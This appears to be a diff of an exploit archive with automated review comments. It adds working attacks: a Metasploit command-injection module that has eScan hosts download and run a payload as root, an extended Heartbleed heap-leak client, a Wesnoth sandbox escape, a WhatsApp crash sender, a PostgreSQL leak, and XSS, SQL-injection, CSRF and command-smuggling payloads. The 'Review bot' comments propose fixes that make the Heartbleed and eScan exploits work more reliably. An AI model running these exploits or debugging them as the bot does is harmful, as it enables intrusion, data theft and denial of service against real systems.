The following example redirection request may be used to carry out this attack:
Location: scp://name:passwd@host/a'``;date >/tmp/test``;'

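--- a/platforms/linux/remote/32837.py
+++ b/platforms/linux/remote/32837.py
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/33971/info
+Wesnoth is prone to a remote code-execution vulnerability caused by a design error.
+Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.
+Versions prior to Wesnoth 1.5.11 are affected.
+#!WPY
+import threading
+os = threading._sys.modules['os']
+f = os.popen("firefox 'http://www.example.com'")
+f.close()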
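Review bot: The script does not say what it is bypassing: the `threading._sys.modules['os']` detour on L1417 only makes sense if Wesnoth's Python AI sandbox blocks `import os` but leaves `threading` importable, and that precondition is nowhere stated. A comment above that line, e.g. `# the AI sandbox whitelists "threading" but not "os"; threading._sys is the real sys module, so its modules table hands back os -- confirm against the 1.5.x whitelist`, would let a reader understand why the indirection is needed rather than treat it as noise.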


@ -1,4 +1,6 @@
/*
* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
@ -1291,4 +1293,4 @@ int main(int argc, char* argv[])
}
/* spabam: It isn't 0day */
// milw0rm.com [2003-04-04]
// milw0rm.com [2003-04-04]

166
platforms/linux/webapps/32869.rb Executable file

@ -0,0 +1,166 @@
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "eScan Web Management Console Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in the eScan Web Management
Console. The vulnerability exists while processing CheckPass login requests. An attacker
with a valid username can use a malformed password to execute arbitrary commands. With
mwconf privileges, the runasroot utility can be abused to get root privileges. This module
has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Joxean Koret', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
],
'Payload' =>
{
'BadChars' => "", # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
'DisableNops' => true
},
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
['eScan 5.5-2 / Linux', {}],
],
'DisclosureDate' => "Apr 04 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10080),
OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
], self.class)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, 'index.php')
})
if res and res.code == 200 and res.body =~ /eScan WebAdmin/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def cmd_exec(session, cmd)
case session.type
when /meterpreter/
print_warning("#{peer} - Use a shell payload in order to get root!")
when /shell/
o = session.shell_command_token(cmd)
o.chomp! if o
end
return "" if o.nil?
return o
end
# Escalating privileges here because runasroot only can't be executed by
# mwconf uid (196).
def on_new_session(session)
cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
super
end
def primer
@payload_url = get_uri
wget_payload
end
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri =~ /#{Regexp.escape(get_resource)}/
print_status("Sending payload...")
send_response(cli, @pl)
end
end
def exploit
@pl = generate_payload_exe
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
@payload_url = ""
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
wget_payload
exec_payload
end
end
# we execute in this way, instead of an ARCH_CMD
# payload because real badchars are: |&)(!><'"`[space]
def wget_payload
@dropped_elf = rand_text_alpha(rand(5) + 3)
command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
print_status("#{peer} - Downloading the payload to the target machine...")
res = exec_command(command)
if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
else
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
end
end
def exec_payload
command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
command << File.join(datastore['WRITABLEDIR'], @dropped_elf)
print_status("#{peer} - Executing the payload...")
exec_command(command, 1)
end
def exec_command(command, timeout=20)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s, 'login.php'),
'vars_post' => {
'uname' => datastore['USERNAME'],
'pass' => ";#{command}",
'product_name' => 'escan',
'language' => 'English',
'login' => 'Login'
}
}, timeout)
end
end
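Review bot: `exec_payload` makes the dropped ELF world-writable with `chmod${IFS}777`; the binary only has to be executable by the mwconf user that runs it, so `chmod${IFS}700` gives the same result without leaving a root-escalation staging file writable by every local user between download and execution. Separately, `WRITABLEDIR` is interpolated into the injection on L1557 and L1567-L1568 without being checked against the bad characters the module itself lists on L1554 (space, quotes, `|`, `&`, `(`, `)`, `<`, `>`, backtick), so a path containing any of them breaks the command silently and the failure surfaces only as "Failed to download the payload"; a guard at the top of `exploit`, e.g. `fail_with(Failure::BadConfig, "WRITABLEDIR contains characters the injection cannot carry") if datastore['WRITABLEDIR'] =~ /[\s|&()!<>'"`]/`, gives a clear error instead. The `cmd_exec(session, cmd)` helper also shadows the mixin method of the same name, which is worth a one-line comment so the next maintainer does not "fix" it.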


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33969/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
Firefox 2.0.0.20 is vulnerable; other versions may also be affected.
<HTML><TITLE>FireFox Print() Function Malform input Crash</TITLE><BODY> <p1>--------------In The Name Of God---------------<br> <p1>---------Apa Center Of Yazd University---------<br> <p1>-------------Http://Www.Ircert.Cc--------------<br> <br>Tested On : FireFox <= 2.0.0.20 Fully Update <br>Note : If the browser alert for print choose cancel <br> <br>Author : b3hz4d (Seyed Behzad Shaghasemi) <br>Site : Www.DeltaHacking.Net <br>Date : 3 Mar 2009 <br>Contact: behzad_sh_66@yahoo.com <br>Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers </p1><br><br> <form> <input type="button" value="bo0o0o0om" onClick="window.print(window.print())" /> </form> </BODY></HTML>

118
platforms/multiple/dos/32865.py Executable file

@ -0,0 +1,118 @@
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Crash on non-printable characters
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.7 and prior on iOS
# Tested on: WhatsApp v2.11.7 on iPhone 5 running iOS 7.0.4
# Solution Status: Fixed by Vendor on v2.11.8
# Date: 8/04/2014
#
# Authors:
# Jaime Sánchez @segofensiva <jsanchez (at) seguridadofensiva.com>
# Pablo San Emeterio @psaneme <psaneme (at) gmail.com>
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.7 for iOS.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
# More info at:
# http://www.seguridadofensiva.com/2014/04/crash-en-whatsapp-para-iphone-en-versiones-inferiores-a-2.11.7.html
# See the slides of the research/talk at RootedCON 2014 at:
# http://www.slideshare.net/segofensiva/whatsapp-mentiras-y-cintas-de-video-rootedcon-2014
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
# or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config.cfg"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
idx = val
elif varname =="password":
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "\xf4\xaa\xde\x04\xbf"
#print countryCode, login, identity, password
wa = WhatsappEchoClient(phone, message)
wa.login(login, password)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("number", help="Phone number to send the crash message")
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
args = parser.parse_args()
Debugger.enabled = args.verbose
main(args.number)


@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/34069/info
PostgreSQL is prone to an information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
PostgreSQL 8.3.6 is vulnerable; other versions may also be affected.
CREATE OR REPLACE FUNCTION do_tell(anyelement)
RETURNS bool
COST 0.1
VOLATILE
LANGUAGE plpgsql
AS $body$
BEGIN
raise notice 'hah: %s', $1::text;
return true;
END;
$body$;
SELECT * FROM restricted_view WHERE do_tell(secret_column);


@ -3,43 +3,69 @@
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics. The exploit can set
* the heatbeart payload length arbitrarily or use two preset
* values for 0x00 and MAX length. The vulnerability occurs due
* returned within encrypted SSL packets and is then decrypted
* and wrote to a file to annoy IDS/forensics. The exploit can
* set heartbeat payload length arbitrarily or use two preset
* values for NULL and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
* is user supplied and returned to the user as part of DTLS/TLS
* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
* 1.0.1f are known affected. You must run this against a target
* which is linked to a vulnerable OpenSSL library using DTLS/TLS.
* This exploit leaks upto 65532 bytes of remote heap each request
* and can be run in a loop until the connected peer ends connection.
* The data leaked contains 16 bytes of random padding at the end.
* The exploit can be used against a connecting client or server,
* it can also send pre_cmd's to plain-text services to establish
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
* will often forcefully close the connection during large leak
* requests so try to lower your payload request size.
*
* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
*
* E.g.
* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
* $ ./heartbleed -s 192.168.11.9 -p 443 -f leakme -t 65535
* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ connecting to 192.168.11.9 443/tcp
* [ connected to 192.168.11.9 443/tcp
* [ setting heartbeat payload_length to 65535
* [ heartbeat returned type=24 length=16416
* [ decrypting and decompressing SSL packet
* [ connecting to 192.168.11.23 443/tcp
* [ connected to 192.168.11.23 443/tcp
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ heartbleed leaked length=65535
* [ final record type=24, length=16384
* [ wrote 16384 bytes to file 'leakme'
* [ wrote 16381 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=42
* [ decrypting SSL packet
* [ final record type=24, length=18
* [ wrote 18 bytes of heap to file 'out'
* [ done.
* $ hexdump -C leakme
* $ ls -al out
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
* $ hexdump -C out
* - snip - snip
*
* Added support for pre_cmd's and as an example use STARTTLS
* to leak from vulnerable SMTP services.
*
* Added experimental support for exploiting connecting clients
* with rogue server. Generate certificates with the following:
* Use following example command to generate certificates for clients.
*
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
* -keyout server.key -out server.crt
*
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
*
* todo: add udp/dtls support.
*
* - Hacker Fantastic
@ -72,6 +98,11 @@
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
int first = 0;
int leakbytes = 0;
int repeat = 1;
int badpackets = 0;
typedef struct {
int socket;
SSL *sslHandle;
@ -89,13 +120,11 @@ typedef struct {
void ssl_init();
void usage();
void* heartbleed(connection*,unsigned int);
void* sneakyleaky(connection*,char*,int);
int tcp_connect(char*,int);
int tcp_bind(char*, int);
connection* tls_connect(int);
connection* tls_bind(int);
int pre_cmd(int,int);
int pre_cmd(int,int,int);
void* heartbleed(connection* ,unsigned int);
void* sneakyleaky(connection* ,char*, int);
@ -161,10 +190,15 @@ void ssl_init(){
connection* tls_connect(int sd){
connection *c;
c = malloc(sizeof(connection));
c->socket = sd;
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(TLSv1_client_method());
c->sslContext = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
c->sslHandle = SSL_new(c->sslContext);
@ -186,12 +220,20 @@ connection* tls_bind(int sd){
connection *c;
char* buf;
buf = malloc(4096);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buf,0,4096);
c = malloc(sizeof(connection));
c->socket = sd;
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(TLSv1_server_method());
c->sslContext = SSL_CTX_new(SSLv23_server_method());
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
@ -218,28 +260,51 @@ connection* tls_bind(int sd){
return c;
}
int pre_cmd(int sd,int verbose){
int pre_cmd(int sd,int precmd,int verbose){
/* this function can be used to send commands to a plain-text
service or client before heartbleed exploit attempt. e.g. STARTTLS */
int rc;
int rc, go = 0;
char* buffer;
char* hello = "EHLO test\n";
char* start = "STARTTLS\n";
buffer = malloc(2049);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
printf("[ banner: %s",buffer);
send(sd,hello,strlen(hello),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
send(sd,start,strlen(start),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
char* line1;
char* line2;
switch(precmd){
case 0:
line1 = "EHLO test\n";
line2 = "STARTTLS\n";
break;
case 1:
line1 = "CAPA\n";
line2 = "STLS\n";
break;
case 2:
line1 = "a001 CAPB\n";
line2 = "a002 STARTTLS\n";
break;
default:
go = 1;
break;
}
if(go==0){
buffer = malloc(2049);
if(buffer==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
printf("[ banner: %s",buffer);
send(sd,line1,strlen(line1),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
send(sd,line2,strlen(line2),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
}
return sd;
}
@ -248,7 +313,11 @@ void* heartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2);
p = buf;
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
p = buf;
*p++ = TLS1_HB_REQUEST;
switch(type){
case 0:
@ -262,7 +331,7 @@ void* heartbleed(connection *c,unsigned int type){
s2n(type,p);
break;
}
printf("[ <3 <3 <3 heart bleed <3 <3 <3 <3\n");
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
OPENSSL_free(buf);
return c;
@ -300,10 +369,19 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
n2s(p,rr->length);
if(rr->type==24){
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
}
}
@ -312,7 +390,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
printf("[ decrypting and decompressing SSL packet\n");
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
rr->data=rr->input;
@ -371,19 +449,56 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
}
rr->off=0;
s->packet_length=0;
if(verbose==1){
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
if(first==0){
uint heartbleed_len = 0;
char* fp = s->s3->rrec.data;
(long)fp++;
memcpy(&heartbleed_len,fp,2);
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
repeat = 1;
}
else{
repeat = 0;
}
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
write(fd,s->s3->rrec.data,s->s3->rrec.length);
close(fd);
printf("[ wrote %d bytes to file '%s'\n",rr->length, filename);
printf("[ done.\n");
exit(0);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
if(first==2){
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf("[ nothing from the heap to write\n");
}
return;
apple:
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
}
void usage(){
@ -392,8 +507,12 @@ void usage(){
printf("[ --port|-p <port> - the port to target\n");
printf("[ --file|-f <filename> - file to write data to\n");
printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n");
printf("[ --type|-t - select exploit to try\n");
printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
printf("[ 0 = SMTP\n");
printf("[ 1 = POP3\n");
printf("[ 2 = IMAP\n");
printf("[ --loop|-l - loop the exploit attempts\n");
printf("[ --type|-t <n> - select exploit to try\n");
printf("[ 0 = null length\n");
printf("[ 1 = max leak\n");
printf("[ n = heartbeat payload_length\n");
@ -406,11 +525,12 @@ void usage(){
int main(int argc, char* argv[]){
int ret, port, userc, index;
int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 0;
int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
int loop = 0;
struct hostent *h;
connection* c;
char *host, *file;
int ihost = 0, iport = 0, ifile = 0, itype = 0;
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
printf("[ =============================================================\n");
static struct option options[] = {
@ -420,11 +540,12 @@ int main(int argc, char* argv[]){
{"type", 1, 0, 't'},
{"bind", 1, 0, 'b'},
{"verbose", 0, 0, 'v'},
{"precmd", 0, 0, 'c'},
{"precmd", 1, 0, 'c'},
{"loop", 0, 0, 'l'},
{"help", 0, 0,'h'}
};
while(userc != -1) {
userc = getopt_long(argc,argv,"s:p:f:t:b:cvh",options,&index);
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
switch(userc) {
case -1:
break;
@ -437,6 +558,10 @@ int main(int argc, char* argv[]){
exit(1);
}
host = malloc(strlen(optarg) + 1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
}
break;
@ -449,6 +574,10 @@ int main(int argc, char* argv[]){
case 'f':
if(ifile==0){
file = malloc(strlen(optarg) + 1);
if(file==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(file,"%s",optarg);
ifile = 1;
}
@ -466,16 +595,26 @@ int main(int argc, char* argv[]){
if(ihost==0){
ihost = 1;
host = malloc(strlen(optarg)+1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
bind = 1;
}
break;
case 'c':
precmd = 1;
if(iprecmd == 0){
iprecmd = 1;
precmd = atoi(optarg);
}
break;
case 'v':
verbose = 1;
break;
case 'l':
loop = 1;
break;
default:
break;
}
@ -487,12 +626,22 @@ int main(int argc, char* argv[]){
ssl_init();
if(bind==0){
ret = tcp_connect(host, port);
if(precmd==1){
pre_cmd(ret, verbose);
}
pre_cmd(ret, precmd, verbose);
c = tls_connect(ret);
heartbleed(c,type);
sneakyleaky(c,file,verbose);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
else{
@ -509,13 +658,23 @@ int main(int argc, char* argv[]){
}
else{
c = tls_bind(sd);
if(precmd==1){
pre_cmd(ret, verbose);
}
pre_cmd(ret, precmd, verbose);
heartbleed(c,type);
sneakyleaky(c,file,verbose);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
}
}
}
}
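Review bot: In sneakyleaky's output branch both write() calls pass `s->s3->rrec.length` as the byte count while starting at `s->s3->rrec.data+3`, so each write reads three bytes past the end of the record, and the `output` value computed just above as `rrec.length-3` is never used as the count. Using `write(fd, s->s3->rrec.data+3, output);` in both branches makes the count match the offset and the byte total printed in the first branch. The open() result is also unchecked, so a failed open leaves fd at -1 and the subsequent write() fails while the "wrote ... bytes" line is still printed. Separately, the bind-mode loop in main sets `repeat=0;` before calling heartbleed() where the connect-mode loop sets `repeat=1;`, so the inner `while(repeat==1)` never runs sneakyleaky() when --loop is combined with --bind; `repeat=1;` looks intended. sneakyleaky's body starts outside the hunk.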


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34001/info
IBM WebSphere Application Server (WAS) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to WAS 6.1.0.23 and 7.0.0.3.
http://www.example.com/ibm/console/<script>alert('DSecRG_XSS')</script>
http://www.example.com/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34288/info
Xlight FTP Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Xlight FTP Server 3.2.1 are affected.
The following example input is available:
User: ' OR '1'='1' ;#


@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/34447/info
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
For the HTML-injection issue:
username: </script><script src="//www.example.com"></script><script>


@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34447/info
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
http://example.com/private/file_management.ssi?PATH=/etc"><script%20src="http://www.example.com"></script>


@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34447/info
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
<html> <body onload="document.foobar.submit()"> <form name="foobar" method="post" action="http://example.com/private/blade_power_action" style="display:none"> <input name="COMMAND" value="6.3.2"> <input name="STATE" value="0"> <input name="CHECKED" value="15"> <input name="selall" value="on"> <input name="sel" value="bl1"> <input name="sel" value="bl2"> <input name="sel" value="bl3"> <input name="sel" value="bl4"> <input name="JUNK" value="1"> </form> <body> </html>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34513/info
IBM Tivoli Continuous Data Protection for Files is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
IBM Tivoli Continuous Data Protection for Files 3.1.4.0 is vulnerable; other versions may also be affected.
http://www.example.com/login/FilepathLogin.html?reason=<script>alert(0)</script>


@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/34267/info
Novell NetStorage is prone to the following remote vulnerabilities:
- An information-disclosure vulnerability
- A cross-site scripting vulnerability
- A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.
The following are vulnerable:
NetStorage 3.1.5-19 on Open Enterprise Server (OES)
